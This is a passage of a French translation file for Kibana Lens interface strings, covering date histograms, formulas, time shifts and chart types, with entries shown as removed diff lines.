"xpack.lens.indexPattern.dateHistogram.bindToGlobalTimePicker": "Lier au sélecteur d'heure globale", - "xpack.lens.indexPattern.dateHistogram.dropPartialBuckets": "Abandonner les compartiments partiels", - "xpack.lens.indexPattern.dateHistogram.dropPartialBucketsHelp": "L’abandon des compartiments partiels est désactivé, car ceux-ci ne peuvent être calculés que pour un champ temporel lié au sélecteur d’heure globale en haut à droite.", - "xpack.lens.indexPattern.dateHistogram.globalTimePickerHelp": "Filtrez le champ sélectionné à l’aide du sélecteur d’heure globale en haut à droite. Ce paramètre ne peut pas être désactivé pour le champ temporel par défaut de la vue de données actuelle.", - "xpack.lens.indexPattern.dateHistogram.includeEmptyRows": "Inclure les lignes vides", - "xpack.lens.indexPattern.dateHistogram.invalidInterval": "Choisissez un intervalle valide. Il n'est pas possible d'utiliser plusieurs semaines, mois ou années comme intervalle.", - "xpack.lens.indexPattern.dateHistogram.minimumInterval": "Intervalle minimal", - "xpack.lens.indexPattern.dateHistogram.moreThanYear": "Plus d'une année", - "xpack.lens.indexPattern.dateHistogram.restrictedInterval": "Intervalle fixé à {intervalValue} en raison de restrictions d'agrégation.", - "xpack.lens.indexPattern.dateHistogram.selectIntervalPlaceholder": "Choisir un intervalle", - "xpack.lens.indexPattern.dateHistogram.selectOptionHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", - "xpack.lens.indexPattern.dateHistogram.titleHelp": "Fonctionnement de l'histogramme des dates automatique", - "xpack.lens.indexPattern.dateHistogram.upTo": "Jusqu'à", - "xpack.lens.indexPattern.dateHistogramTimeShift": "Dans un calque unique, vous ne pouvez pas combiner un décalage de plage temporelle précédent avec des histogrammes de dates. Utilisez une durée de décalage temporel explicite dans \"{column}\" ou remplacez l’histogramme de dates.", - "xpack.lens.indexPattern.decimalPlacesLabel": "Décimales", - "xpack.lens.indexPattern.defaultFormatLabel": "Par défaut", - "xpack.lens.indexPattern.derivative": "Différences", - "xpack.lens.indexPattern.derivativeOf": "Différences de {name}", - "xpack.lens.indexPattern.differences.signature": "indicateur : nombre", - "xpack.lens.indexPattern.editFieldLabel": "Modifier le champ de la vue de données", - "xpack.lens.indexPattern.emptyDimensionButton": "Dimension vide", - "xpack.lens.indexPattern.emptyFieldsLabel": "Champs vides", - "xpack.lens.indexPattern.emptyFieldsLabelHelp": "Les champs vides ne contenaient aucune valeur dans les 500 premiers documents basés sur vos filtres.", - "xpack.lens.indexPattern.enableAccuracyMode": "Activer le mode de précision", - "xpack.lens.indexPattern.existenceErrorAriaLabel": "La récupération de l'existence a échoué", - "xpack.lens.indexPattern.existenceErrorLabel": "Impossible de charger les informations de champ", - "xpack.lens.indexPattern.existenceTimeoutAriaLabel": "La récupération de l'existence a expiré", - "xpack.lens.indexPattern.existenceTimeoutLabel": "Les informations de champ ont pris trop de temps", - "xpack.lens.indexPattern.fieldDistributionLabel": "Distribution", - "xpack.lens.indexPattern.fieldItem.visualizeGeoFieldLinkText": "Visualiser dans Maps", - "xpack.lens.indexPattern.fieldItemTooltip": "Effectuez un glisser-déposer pour visualiser.", - "xpack.lens.indexPattern.fieldNoOperation": "Le champ {field} ne peut pas être utilisé sans opération", - "xpack.lens.indexPattern.fieldPanelEmptyStringValue": "Chaîne vide", - "xpack.lens.indexPattern.fieldPlaceholder": "Champ", - "xpack.lens.indexPattern.fieldsNotFound": "{count, plural, one {Champ} other {Champs}} {missingFields} {count, plural, one {introuvable} other {introuvables}}", - "xpack.lens.indexPattern.fieldStatsButtonAriaLabel": "Prévisualiser {fieldName} : {fieldType}", - "xpack.lens.indexPattern.fieldStatsButtonEmptyLabel": "Ce champ ne comporte aucune donnée mais vous pouvez toujours effectuer un glisser-déposer pour visualiser.", - "xpack.lens.indexPattern.fieldStatsButtonLabel": "Cliquez pour obtenir un aperçu du champ, ou effectuez un glisser-déposer pour visualiser.", - "xpack.lens.indexPattern.fieldStatsCountLabel": "Compte", - "xpack.lens.indexPattern.fieldStatsDisplayToggle": "Basculer soit", - "xpack.lens.indexPattern.fieldStatsLimited": "Le résumé des informations n'est pas disponible pour les champs de type de gamme.", - "xpack.lens.indexPattern.fieldStatsMurmur3Limited": "Le résumé des informations n'est pas disponible pour les champs murmur3.", - "xpack.lens.indexPattern.fieldStatsNoData": "Lens ne peut pas créer de visualisation avec ce champ, car il ne contient pas de données. Pour créer une visualisation, glissez-déposez un autre champ.", - "xpack.lens.indexPattern.fieldStatsSamplingNoData": "Lens ne peut pas créer de visualisation avec ce champ, car il ne contient aucune donnée dans les 500 premiers documents correspondant aux filtres. Pour créer une visualisation, glissez-déposez un autre champ.", - "xpack.lens.indexPattern.fieldsWrongType": "{count, plural, one {Champ} other {Champs}} {invalidFields} {count, plural, other {de type incorrect}}", - "xpack.lens.indexPattern.fieldTimeDistributionLabel": "Répartition du temps", - "xpack.lens.indexPattern.fieldTopValuesLabel": "Valeurs les plus élevées", - "xpack.lens.indexPattern.filterBy.clickToEdit": "Cliquer pour modifier", - "xpack.lens.indexPattern.filterBy.emptyFilterQuery": "(vide)", - "xpack.lens.indexPattern.filterBy.label": "Filtrer par", - "xpack.lens.indexPattern.filters": "Filtres", - "xpack.lens.indexPattern.filters.addaFilter": "Ajouter un filtre", - "xpack.lens.indexPattern.filters.clickToEdit": "Cliquer pour modifier", - "xpack.lens.indexPattern.filters.isInvalid": "Cette requête n'est pas valide", - "xpack.lens.indexPattern.filters.label.placeholder": "Tous les enregistrements", - "xpack.lens.indexPattern.filters.queryPlaceholderKql": "{example}", - "xpack.lens.indexPattern.filters.queryPlaceholderLucene": "{example}", - "xpack.lens.indexPattern.filters.removeFilter": "Retirer un filtre", - "xpack.lens.indexPattern.formulaExpressionNotHandled": "L'opération {operation} dans la formule ne comprend pas les paramètres suivants : {params}", - "xpack.lens.indexPattern.formulaExpressionParseError": "La formule {expression} ne peut pas être analysée", - "xpack.lens.indexPattern.formulaExpressionWrongType": "Les paramètres de l'opération {operation} dans la formule ont un type incorrect : {params}", - "xpack.lens.indexPattern.formulaFieldNotFound": "{variablesLength, plural, one {Champ} other {Champs}} {variablesList} introuvable(s)", - "xpack.lens.indexPattern.formulaFieldNotRequired": "L'opération {operation} n'accepte aucun champ comme argument", - "xpack.lens.indexPattern.formulaFieldValue": "champ", - "xpack.lens.indexPattern.formulaFilterableHelpText": "Le filtre spécifié sera appliqué à la formule entière.", - "xpack.lens.indexPattern.formulaLabel": "Formule", - "xpack.lens.indexPattern.formulaMathMissingArgument": "L'opération {operation} dans la formule ne comprend pas les arguments {count} : {params}", - "xpack.lens.indexPattern.formulaMetricValue": "indicateur", - "xpack.lens.indexPattern.formulaNoFieldForOperation": "aucun champ", - "xpack.lens.indexPattern.formulaNoOperation": "aucune opération", - "xpack.lens.indexPattern.formulaOperationDoubleQueryError": "Utilisez uniquement kql= ou lucene=, mais pas les deux", - "xpack.lens.indexPattern.formulaOperationDuplicateParams": "Les paramètres de l'opération {operation} ont été déclarés plusieurs fois : {params}", - "xpack.lens.indexPattern.formulaOperationFiltersTypeConflicts": "Le filtre de formule de type \"{outerType}\" n’est pas compatible avec le filtre interne de type \"{innerType}\" de l’opération {operation}.", - "xpack.lens.indexPattern.formulaOperationQueryError": "Des guillemets simples sont requis pour {language}='' à {rawQuery}", - "xpack.lens.indexPattern.formulaOperationTooManyFirstArguments": "L'opération {operation} dans la formule requiert un {type} {supported, plural, one {unique} other {pris en charge}}, trouvé : {text}", - "xpack.lens.indexPattern.formulaOperationValue": "opération", - "xpack.lens.indexPattern.formulaOperationwrongArgument": "L'opération {operation} dans la formule ne prend pas en charge les paramètres {type}, trouvé : {text}", - "xpack.lens.indexPattern.formulaOperationWrongFirstArgument": "Le premier argument pour {operation} doit être un nom {type}. Trouvé {argument}", - "xpack.lens.indexPattern.formulaOperationWrongReturnedType": "Le type de valeur de retour de l’opération {text} n’est pas pris en charge dans la formule.", - "xpack.lens.indexPattern.formulaParameterNotRequired": "L'opération {operation} n'accepte aucun paramètre", - "xpack.lens.indexPattern.formulaPartLabel": "Partie de {label}", - "xpack.lens.indexPattern.formulaWarning": "Formule actuellement appliquée", - "xpack.lens.indexPattern.formulaWarningStaticValueText": "Pour écraser votre formule, modifiez la valeur dans le champ de saisie.", - "xpack.lens.indexPattern.formulaWarningText": "Pour écraser votre formule, sélectionnez une fonction rapide", - "xpack.lens.indexPattern.formulaWithTooManyArguments": "L'opération {operation} a trop d'arguments", - "xpack.lens.indexPattern.functionsLabel": "Fonctions", - "xpack.lens.indexPattern.groupByDropdown": "Regrouper par", - "xpack.lens.indexPattern.helpLabel": "Aide sur les fonctions", - "xpack.lens.indexPattern.hideZero": "Masquer les valeurs nulles", - "xpack.lens.indexPattern.incompleteOperation": "(incomplet)", - "xpack.lens.indexPattern.intervals": "Intervalles", - "xpack.lens.indexPattern.invalidFieldLabel": "Champ non valide. Vérifiez votre vue de données ou choisissez un autre champ.", - "xpack.lens.indexPattern.invalidOperationLabel": "Ce champ ne fonctionne pas avec la fonction sélectionnée.", - "xpack.lens.indexPattern.invalidReferenceConfiguration": "La dimension \"{dimensionLabel}\" n'est pas configurée correctement", - "xpack.lens.indexPattern.invalidTimeShift": "Décalage non valide. Entrez un entier positif suivi par l'une des unités suivantes : s, m, h, d, w, M, y. Par exemple, 3h pour 3 heures", - "xpack.lens.indexPattern.lastValue": "Dernière valeur", - "xpack.lens.indexPattern.lastValue.disabled": "Cette fonction requiert la présence d'un champ de date dans la vue de données.", - "xpack.lens.indexPattern.lastValue.invalidTypeSortField": "Le champ {invalidField} n'est pas un champ de date et ne peut pas être utilisé pour le tri", - "xpack.lens.indexPattern.lastValue.showArrayValues": "Afficher les valeurs de tableau", - "xpack.lens.indexPattern.lastValue.showArrayValuesExplanation": "Affiche toutes les valeurs associées à ce champ dans chaque dernier document.", - "xpack.lens.indexPattern.lastValue.showArrayValuesWithTopValuesWarning": "Lorsque vous affichez les valeurs de tableau, vous ne pouvez pas utiliser ce champ pour classer les valeurs les plus élevées.", - "xpack.lens.indexPattern.lastValue.signature": "champ : chaîne", - "xpack.lens.indexPattern.lastValue.sortField": "Trier par le champ de date", - "xpack.lens.indexPattern.lastValue.sortFieldNotFound": "Champ {invalidField} introuvable", - "xpack.lens.indexPattern.lastValue.sortFieldPlaceholder": "Champ de tri", - "xpack.lens.indexPattern.lastValueOf": "Dernière valeur de {name}", - "xpack.lens.indexPattern.layerErrorWrapper": "Erreur de {position} pour le calque : {wrappedMessage}", - "xpack.lens.indexPattern.max": "Maximum", - "xpack.lens.indexPattern.max.description": "Agrégation d'indicateurs à valeur unique qui renvoie la valeur maximale des valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.maxOf": "Maximum de {name}", - "xpack.lens.indexPattern.median": "Médiane", - "xpack.lens.indexPattern.median.description": "Agrégation d'indicateurs à valeur unique qui calcule la valeur médiane des valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.medianOf": "Médiane de {name}", - "xpack.lens.indexPattern.metaFieldsLabel": "Champs méta", - "xpack.lens.indexPattern.metric.signature": "champ : chaîne", - "xpack.lens.indexPattern.min": "Minimum", - "xpack.lens.indexPattern.min.description": "Agrégation d'indicateurs à valeur unique qui renvoie la valeur minimale des valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.minOf": "Minimum de {name}", - "xpack.lens.indexPattern.missingDataView": "{count, plural, one {Vue de données} other {Vues de données}} ({count, plural, one {id} other {ids}} : {indexpatterns}) {count, plural, one {introuvable} other {introuvables}}", - "xpack.lens.indexPattern.missingFieldLabel": "Champ manquant", - "xpack.lens.indexPattern.missingReferenceError": "\"{dimensionLabel}\" n'est pas entièrement configuré", - "xpack.lens.indexPattern.moveToWorkspace": "Ajouter {field} à l'espace de travail", - "xpack.lens.indexPattern.moveToWorkspaceDisabled": "Ce champ ne peut pas être ajouté automatiquement à l'espace de travail. Vous pouvez toujours l'utiliser directement dans le panneau de configuration.", - "xpack.lens.indexPattern.moving_average.signature": "indicateur : nombre, [window] : nombre", - "xpack.lens.indexPattern.movingAverage": "Moyenne mobile", - "xpack.lens.indexPattern.movingAverage.basicExplanation": "La moyenne mobile fait glisser une fenêtre sur les données et affiche la valeur moyenne. La moyenne mobile est prise en charge uniquement par les histogrammes des dates.", - "xpack.lens.indexPattern.movingAverage.limitations": "La première valeur de moyenne mobile commence au deuxième élément.", - "xpack.lens.indexPattern.movingAverage.longerExplanation": "Pour calculer la moyenne mobile, Lens utilise la moyenne de la fenêtre et applique une politique d'omission pour les blancs. Pour les valeurs manquantes, le groupe est ignoré, et le calcul est effectué sur la valeur suivante.", - "xpack.lens.indexPattern.movingAverage.tableExplanation": "Par exemple, avec les données [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], vous pouvez calculer une moyenne mobile simple avec une taille de fenêtre de 5 :", - "xpack.lens.indexPattern.movingAverage.titleHelp": "Fonctionnement de la moyenne mobile", - "xpack.lens.indexPattern.movingAverage.window": "Taille de fenêtre", - "xpack.lens.indexPattern.movingAverage.windowInitialPartial": "La fenêtre est partielle jusqu'à ce qu'elle atteigne le nombre demandé d'éléments. Par exemple, avec une taille de fenêtre de 5 :", - "xpack.lens.indexPattern.movingAverage.windowLimitations": "La fenêtre n'inclut pas la valeur actuelle.", - "xpack.lens.indexPattern.movingAverageOf": "Moyenne mobile de {name}", - "xpack.lens.indexPattern.multipleDateHistogramsError": "\"{dimensionLabel}\" n'est pas le seul histogramme des dates. Lorsque vous utilisez des décalages, veillez à n'utiliser qu'un seul histogramme des dates.", - "xpack.lens.indexPattern.multipleTermsOf": "Les valeurs les plus élevées de {name} + {count} {count, plural, one {autre} other {autres}}", - "xpack.lens.indexPattern.noDataViewDescription": "Veuillez créer une vue de données ou basculer vers une autre source de données.", - "xpack.lens.indexPattern.noDataViewsLabel": "Aucune vue de données", - "xpack.lens.indexPattern.noRealMetricError": "Un calque uniquement doté de valeurs statiques n’affichera pas de résultats ; utilisez au moins un indicateur dynamique.", - "xpack.lens.indexPattern.numberFormatLabel": "Nombre", - "xpack.lens.indexPattern.ofDocumentsLabel": "documents", - "xpack.lens.indexPattern.operationsNotFound": "{operationLength, plural, one {Opération} other {Opérations}} {operationsList} non trouvée(s)", - "xpack.lens.indexPattern.otherDocsLabel": "Autre", - "xpack.lens.indexPattern.overall_metric": "indicateur : nombre", - "xpack.lens.indexPattern.overallAverageOf": "Moyenne générale de {name}", - "xpack.lens.indexPattern.overallMax": "Max général", - "xpack.lens.indexPattern.overallMaxOf": "Max général de {name}", - "xpack.lens.indexPattern.overallMin": "Min général", - "xpack.lens.indexPattern.overallMinOf": "Min général de {name}", - "xpack.lens.indexPattern.overallSum": "Somme générale", - "xpack.lens.indexPattern.overallSumOf": "Somme générale de {name}", - "xpack.lens.indexPattern.percentageOfLabel": "{percentage} % de", - "xpack.lens.indexPattern.percentFormatLabel": "Pour cent", - "xpack.lens.indexPattern.percentile": "Centile", - "xpack.lens.indexPattern.percentile.errorMessage": "Le centile doit être un entier compris entre 1 et 99", - "xpack.lens.indexPattern.percentile.percentileValue": "Centile", - "xpack.lens.indexPattern.percentile.signature": "champ : chaîne, [percentile] : nombre", - "xpack.lens.indexPattern.percentileOf": "{percentile, selectordinal, one {#er} two {#e} few {#e} other {#e}} centile de {name}", - "xpack.lens.indexPattern.pinnedTopValuesLabel": "Filtres de {field}", - "xpack.lens.indexPattern.precisionErrorWarning.accuracyDisabled": "{name} peut être une approximation. Vous pouvez activer le mode de précision pour obtenir des résultats plus fins, mais notez que ce mode augmente la charge sur le cluster Elasticsearch. {learnMoreLink}", - "xpack.lens.indexPattern.precisionErrorWarning.accuracyEnabled": "{name} peut être une approximation. Pour obtenir des résultats plus précis, essayez d'augmenter le nombre de {topValues} ou d'utiliser des {filters} à la place. {learnMoreLink}", - "xpack.lens.indexPattern.precisionErrorWarning.filters": "filtres", - "xpack.lens.indexPattern.precisionErrorWarning.link": "En savoir plus.", - "xpack.lens.indexPattern.precisionErrorWarning.topValues": "valeurs les plus élevées", - "xpack.lens.indexPattern.quickFunctionsLabel": "Fonctions rapides", - "xpack.lens.indexPattern.range.isInvalid": "Cette plage n'est pas valide", - "xpack.lens.indexPattern.ranges.addRange": "Ajouter une plage", - "xpack.lens.indexPattern.ranges.customIntervalsToggle": "Créer des plages personnalisées", - "xpack.lens.indexPattern.ranges.customRangeLabelPlaceholder": "Étiquette personnalisée", - "xpack.lens.indexPattern.ranges.customRanges": "Plages", - "xpack.lens.indexPattern.ranges.customRangesRemoval": "Retirer les plages personnalisées", - "xpack.lens.indexPattern.ranges.decreaseButtonLabel": "Diminuer la granularité", - "xpack.lens.indexPattern.ranges.deleteRange": "Supprimer la plage", - "xpack.lens.indexPattern.ranges.granularity": "Granularité des intervalles", - "xpack.lens.indexPattern.ranges.granularityHelpText": "Fonctionnement", - "xpack.lens.indexPattern.ranges.granularityPopoverAdvancedExplanation": "Les intervalles sont incrémentés par 10, 5 ou 2. Par exemple, un intervalle peut être 100 ou 0,2 .", - "xpack.lens.indexPattern.ranges.granularityPopoverBasicExplanation": "La granularité des intervalles divise le champ en intervalles régulièrement espacés sur la base des valeurs minimales et maximales du champ.", - "xpack.lens.indexPattern.ranges.granularityPopoverExplanation": "La taille de l'intervalle est une valeur de \"gentillesse\". Lorsque la granularité du curseur change, l'intervalle reste le même lorsque l'intervalle de \"gentillesse\" est le même. La granularité minimale est 1, et la valeur maximale est {setting}. Pour modifier la granularité maximale, accédez aux Paramètres avancés.", - "xpack.lens.indexPattern.ranges.granularityPopoverTitle": "Fonctionnement de la granularité des intervalles", - "xpack.lens.indexPattern.ranges.includeEmptyRows": "Inclure les lignes vides", - "xpack.lens.indexPattern.ranges.increaseButtonLabel": "Augmenter la granularité", - "xpack.lens.indexPattern.ranges.lessThanOrEqualAppend": "≤", - "xpack.lens.indexPattern.ranges.lessThanOrEqualTooltip": "Inférieur ou égal à", - "xpack.lens.indexPattern.ranges.lessThanPrepend": "<", - "xpack.lens.indexPattern.ranges.lessThanTooltip": "Inférieur à", - "xpack.lens.indexPattern.rareTermsOf": "Valeurs rares de {name}", - "xpack.lens.indexPattern.records": "Enregistrements", - "xpack.lens.indexPattern.referenceFunctionPlaceholder": "Sous-fonction", - "xpack.lens.indexPattern.removeColumnLabel": "Retirer la configuration de \"{groupLabel}\"", - "xpack.lens.indexPattern.removeFieldLabel": "Retirer le champ de la vue de données", - "xpack.lens.indexPattern.sortField.invalid": "Champ non valide. Vérifiez votre vue de données ou choisissez un autre champ.", - "xpack.lens.indexPattern.staticValue.label": "Valeur de la ligne de référence", - "xpack.lens.indexPattern.staticValueError": "La valeur statique de {value} n’est pas un nombre valide.", - "xpack.lens.indexPattern.staticValueLabel": "Valeur statique", - "xpack.lens.indexPattern.staticValueLabelDefault": "Valeur statique", - "xpack.lens.indexPattern.staticValueLabelWithValue": "Valeur statique : {value}", - "xpack.lens.indexPattern.staticValueWarning": "Valeur statique actuellement appliquée", - "xpack.lens.indexPattern.staticValueWarningText": "Pour écraser la valeur statique, sélectionnez une fonction rapide.", - "xpack.lens.indexPattern.suffixLabel": "Suffixe", - "xpack.lens.indexPattern.suggestedValueAriaLabel": "Valeur suggérée : {value} pour {groupLabel}", - "xpack.lens.indexpattern.suggestions.nestingChangeLabel": "{innerOperation} pour chaque {outerOperation}", - "xpack.lens.indexpattern.suggestions.overallLabel": "{operation} générale", - "xpack.lens.indexpattern.suggestions.overTimeLabel": "Sur la durée", - "xpack.lens.indexPattern.sum": "Somme", - "xpack.lens.indexPattern.sum.description": "Agrégation d'indicateurs à valeur unique qui récapitule les valeurs numériques extraites des documents agrégés.", - "xpack.lens.indexPattern.sumOf": "Somme de {name}", - "xpack.lens.indexPattern.switchToRare": "Classer par rareté", - "xpack.lens.indexPattern.terms": "Valeurs les plus élevées", - "xpack.lens.indexPattern.terms.accuracyModeDescription": "Activer le mode de précision", - "xpack.lens.indexPattern.terms.accuracyModeHelp": "Améliore les données à haute cardinalité, mais augmente la charge sur le cluster Elasticsearch.", - "xpack.lens.indexPattern.terms.addaFilter": "Ajouter un champ", - "xpack.lens.indexPattern.terms.advancedSettings": "Avancé", - "xpack.lens.indexPattern.terms.chooseFields": "{count, plural, zero {Champ} other {Champs}}", - "xpack.lens.indexPattern.terms.deleteButtonAriaLabel": "Supprimer", - "xpack.lens.indexPattern.terms.deleteButtonDisabled": "Cette fonction nécessite au minimum un champ défini.", - "xpack.lens.indexPattern.terms.deleteButtonLabel": "Supprimer", - "xpack.lens.indexPattern.terms.dragToReorder": "Faire glisser pour réorganiser", - "xpack.lens.indexPattern.terms.invalidFieldsErrorShort": "{invalidFieldsCount, plural, one {Champ invalide} other {Champs invalides}} : {invalidFields}. Vérifiez votre vue de données ou choisissez un autre champ.", - "xpack.lens.indexPattern.terms.maxDocCount": "Nombre de documents maximum par terme", - "xpack.lens.indexPattern.terms.missingBucketDescription": "Inclure les documents sans ce champ", - "xpack.lens.indexPattern.terms.missingLabel": "(valeur manquante)", - "xpack.lens.indexPattern.terms.orderAlphabetical": "Alphabétique", - "xpack.lens.indexPattern.terms.orderAscending": "Croissant", - "xpack.lens.indexPattern.terms.orderBy": "Classer par", - "xpack.lens.indexPattern.terms.orderByHelp": "Spécifie la dimension selon laquelle les valeurs les plus élevées sont classées.", - "xpack.lens.indexPattern.terms.orderDescending": "Décroissant", - "xpack.lens.indexPattern.terms.orderDirection": "Sens de classement", - "xpack.lens.indexPattern.terms.orderRare": "Rareté", - "xpack.lens.indexPattern.terms.otherBucketDescription": "Regrouper les autres valeurs sous \"Autre\"", - "xpack.lens.indexPattern.terms.otherLabel": "Autre", - "xpack.lens.indexPattern.terms.scriptedFieldErrorShort": "Les champs scriptés ne sont pas pris en charge en cas d’utilisation de champs multiples.", - "xpack.lens.indexPattern.terms.size": "Nombre de valeurs", - "xpack.lens.indexPattern.terms.sizeLimitMax": "La valeur est supérieure au maximum {max} ; elle est remplacée par la valeur maximale.", - "xpack.lens.indexPattern.terms.sizeLimitMin": "La valeur est inférieure au minimum {min} ; elle est remplacée par la valeur minimale.", - "xpack.lens.indexPattern.termsOf": "{numberOfTermsLabel} {termsCount, plural, one {valeur la plus élevée} other {valeurs les plus élevées}} de {name}", - "xpack.lens.indexPattern.termsWithMultipleShifts": "Dans un seul calque, il est impossible de combiner des indicateurs avec des décalages temporels différents et des valeurs dynamiques les plus élevées. Utilisez la même valeur de décalage pour tous les indicateurs, ou utilisez des filtres à la place des valeurs les plus élevées.", - "xpack.lens.indexPattern.termsWithMultipleShiftsFixActionLabel": "Utiliser des filtres", - "xpack.lens.indexPattern.termsWithMultipleTermsAndScriptedFields": "Les champs scriptés ne sont pas pris en charge lors de l’utilisation de champs multiples ; {fields} trouvés.", - "xpack.lens.indexPattern.time_scale": "indicateur : nombre, unité : s|m|h|d|w|M|y", - "xpack.lens.indexPattern.timeScale": "Normaliser par unité", - "xpack.lens.indexPattern.timeScale.label": "Normaliser par unité", - "xpack.lens.indexPattern.timeScale.missingUnit": "Aucune unité spécifiée pour Normaliser par unité.", - "xpack.lens.indexPattern.timeScale.tooltip": "Normalisez les valeurs pour qu'elles soient toujours affichées en tant que taux par unité de temps spécifiée, indépendamment de l'intervalle de dates sous-jacent.", - "xpack.lens.indexPattern.timeScale.wrongUnit": "Unité spécifiée inconnue, utilisez s,m,h ou d.", - "xpack.lens.indexPattern.timeShift.12hours": "Il y a 12 heures (12h)", - "xpack.lens.indexPattern.timeShift.3hours": "Il y a 3 heures (3h)", - "xpack.lens.indexPattern.timeShift.3months": "Il y a 3 mois (3M)", - "xpack.lens.indexPattern.timeShift.6hours": "Il y a 6 heures (6h)", - "xpack.lens.indexPattern.timeShift.6months": "Il y a 6 mois (6M)", - "xpack.lens.indexPattern.timeShift.day": "Il y a 1 jour (1d)", - "xpack.lens.indexPattern.timeShift.genericInvalidHelp": "La valeur de décalage temporel n’est pas valide.", - "xpack.lens.indexPattern.timeShift.help": "Entrer le nombre et l'unité du décalage temporel", - "xpack.lens.indexPattern.timeShift.hour": "Il y a 1 heure (1h)", - "xpack.lens.indexPattern.timeShift.label": "Décalage temporel", - "xpack.lens.indexPattern.timeShift.month": "Il y a 1 mois (1M)", - "xpack.lens.indexPattern.timeShift.noMultipleHelp": "Le décalage temporel doit être un multiple de l'intervalle de l'histogramme des dates. Ajustez le décalage ou l'intervalle de l'histogramme des dates", - "xpack.lens.indexPattern.timeShift.previous": "Plage temporelle précédente", - "xpack.lens.indexPattern.timeShift.tooSmallHelp": "Le décalage temporel doit être supérieur à l'intervalle de l'histogramme des dates. Augmentez le décalage ou spécifiez un intervalle plus petit dans l'histogramme des dates", - "xpack.lens.indexPattern.timeShift.week": "Il y a 1 semaine (1w)", - "xpack.lens.indexPattern.timeShift.year": "Il y a 1 an (1y)", - "xpack.lens.indexPattern.timeShiftMultipleWarning": "{label} utilise un décalage temporel de {columnTimeShift} qui n'est pas un multiple de l'intervalle de l'histogramme des dates de {interval}. Pour éviter une non-correspondance des données, utilisez un multiple de {interval} comme décalage.", - "xpack.lens.indexPattern.timeShiftPlaceholder": "Saisissez des valeurs personnalisées (par ex. 8w)", - "xpack.lens.indexPattern.timeShiftSmallWarning": "{label} utilise un décalage temporel de {columnTimeShift} qui est inférieur à l'intervalle de l'histogramme des dates de {interval}. Pour éviter une non-correspondance des données, utilisez un multiple de {interval} comme décalage.", - "xpack.lens.indexPattern.uniqueLabel": "{label} [{num}]", - "xpack.lens.indexPattern.useAsTopLevelAgg": "Regrouper d'abord en fonction de ce champ", - "xpack.lens.indexPatterns.clearFiltersLabel": "Effacer le nom et saisissez les filtres", - "xpack.lens.indexPatterns.fieldFiltersLabel": "Filtrer par type", - "xpack.lens.indexPatterns.fieldSearchLiveRegion": "{availableFields} {availableFields, plural, one {champ} other {champs}} disponible(s). {emptyFields} {emptyFields, plural, one {champ} other {champs}} vide(s). {metaFields} {metaFields, plural, one {champ} other {champs}} méta.", - "xpack.lens.indexPatterns.filterByNameLabel": "Rechercher les noms de champs", - "xpack.lens.indexPatterns.noAvailableDataLabel": "Aucun champ disponible ne contient de données.", - "xpack.lens.indexPatterns.noDataLabel": "Aucun champ.", - "xpack.lens.indexPatterns.noEmptyDataLabel": "Aucun champ vide.", - "xpack.lens.indexPatterns.noFields.extendTimeBullet": "Extension de la plage temporelle", - "xpack.lens.indexPatterns.noFields.fieldTypeFilterBullet": "Utilisation de différents filtres de champ", - "xpack.lens.indexPatterns.noFields.globalFiltersBullet": "Modification des filtres globaux", - "xpack.lens.indexPatterns.noFields.tryText": "Essayer :", - "xpack.lens.indexPatterns.noFieldsLabel": "Aucun champ n'existe dans cette vue de données.", - "xpack.lens.indexPatterns.noFilteredFieldsLabel": "Aucun champ ne correspond aux filtres sélectionnés.", - "xpack.lens.indexPatterns.noMetaDataLabel": "Aucun champ méta.", - "xpack.lens.indexPatternSuggestion.removeLayerLabel": "Afficher uniquement {indexPatternTitle}", - "xpack.lens.indexPatternSuggestion.removeLayerPositionLabel": "Afficher uniquement le calque {layerNumber}", - "xpack.lens.label.gauge.labelMajor.header": "Titre", - "xpack.lens.label.gauge.labelMinor.header": "Sous-titre", - "xpack.lens.label.header": "Étiquette", - "xpack.lens.label.shared.axisHeader": "Titre de l'axe", - "xpack.lens.labelInput.label": "Étiquette", - "xpack.lens.layerPanel.layerVisualizationType": "Type de visualisation du calque", - "xpack.lens.layerPanel.missingDataView": "Vue de données introuvable", - "xpack.lens.legacyUrlConflict.objectNoun": "Visualisation Lens", - "xpack.lens.lensSavedObjectLabel": "Visualisation Lens", - "xpack.lens.lineMarker.positionRequirementTooltip": "Vous devez sélectionner une icône ou afficher le nom pour pouvoir en modifier la position.", - "xpack.lens.lineMarker.textVisibility": "Décoration du texte", - "xpack.lens.metric.addLayer": "Visualisation", - "xpack.lens.metric.dynamicColoring.label": "Couleur par valeur", - "xpack.lens.metric.groupLabel": "Valeur d’objectif et unique", - "xpack.lens.metric.label": "Indicateur", - "xpack.lens.pageTitle": "Lens", - "xpack.lens.paletteHeatmapGradient.customize": "Modifier", - "xpack.lens.paletteHeatmapGradient.customizeLong": "Modifier la palette", - "xpack.lens.paletteHeatmapGradient.label": "Couleur", - "xpack.lens.paletteMetricGradient.label": "Couleur", - "xpack.lens.palettePicker.label": "Palette de couleurs", - "xpack.lens.paletteTableGradient.customize": "Modifier", - "xpack.lens.paletteTableGradient.label": "Couleur", - "xpack.lens.pie.addLayer": "Visualisation", - "xpack.lens.pie.arrayValues": "{label} contient des valeurs de tableau. Le rendu de votre visualisation peut ne pas se présenter comme attendu.", - "xpack.lens.pie.donutLabel": "Graphique en anneau", - "xpack.lens.pie.groupLabel": "Proportion", - "xpack.lens.pie.groupsizeLabel": "Taille par", - "xpack.lens.pie.mosaiclabel": "Mosaïque", - "xpack.lens.pie.mosaicSuggestionLabel": "En mosaïque", - "xpack.lens.pie.pielabel": "Camembert", - "xpack.lens.pie.sliceGroupLabel": "Section par", - "xpack.lens.pie.smallValuesWarningMessage": "Les graphiques en gaufre ne permettent pas d’afficher correctement les petites valeurs de champ. Pour afficher toutes les valeurs de champ, utilisez le tableau de données ou le compartimentage.", - "xpack.lens.pie.suggestionLabel": "Comme {chartName}", - "xpack.lens.pie.treemapGroupLabel": "Regrouper par", - "xpack.lens.pie.treemaplabel": "Compartimentage", - "xpack.lens.pie.treemapSuggestionLabel": "Comme compartimentage", - "xpack.lens.pie.wafflelabel": "Gaufre", - "xpack.lens.pie.waffleSuggestionLabel": "En gaufre", - "xpack.lens.pieChart.categoriesInLegendLabel": "Masquer les étiquettes", - "xpack.lens.pieChart.emptySizeRatioLabel": "Taille de la zone intérieure", - "xpack.lens.pieChart.emptySizeRatioOptions.large": 